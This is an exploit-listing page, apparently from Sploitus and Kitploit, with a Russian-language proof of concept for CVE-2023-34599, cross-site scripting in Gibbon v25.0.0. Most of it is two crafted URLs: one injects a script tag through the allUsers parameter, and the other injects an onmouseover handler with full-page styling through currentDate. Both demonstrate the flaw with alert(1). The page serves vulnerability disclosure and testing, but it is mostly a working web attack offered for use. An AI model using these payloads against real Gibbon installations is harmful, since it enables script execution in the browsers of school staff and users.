Sploitus

Exploit for CVE-2023-34599

kitploit · 2026-08-27

Exploit Code

MARKDOWN16 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-MADDSEC-CVE-2023-34599
# CVE-2023-34599

В Gibbon v25.0.0 обнаружено несколько уязвимостей межсайтового скриптинга (XSS), которые позволяют злоумышленникам выполнять произвольный JavaScript-код.

# Подтверждение концепции

# Параметр allUsers

http://gibbon.local/index.php?q=/modules/Timetable Admin/courseEnrolment_manage_byPerson_edit.php&gibbonPersonID=0000000001&gibbonSchoolYearID=025&type=Staff&allUsers=rcnk4'>lo352 http://gibbon.local/index.php?q=%2fmodules%2fTimetable%20Admin%2fcourseEnrolment_manage_byPerson_edit.php&gibbonPersonID=0000000001&gibbonSchoolYearID=025&type=Staff&allUsers=rcnk4%27%3e%3cscript%3ealert(1)%3c%2fscript%3elo352

![1](https://assets.kitploit.com/production/public/readmes/28820/639fc6b7174db2a469ad1482fba6ba8ef789d6ec53263d2d27c32800880bde7c.png)

# Параметр currentDate

http://gibbon.local/index.php?q=/modules/Departments/department_course_class.php&gibbonCourseClassID=00002426&currentDate=ceb7h"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"f74wd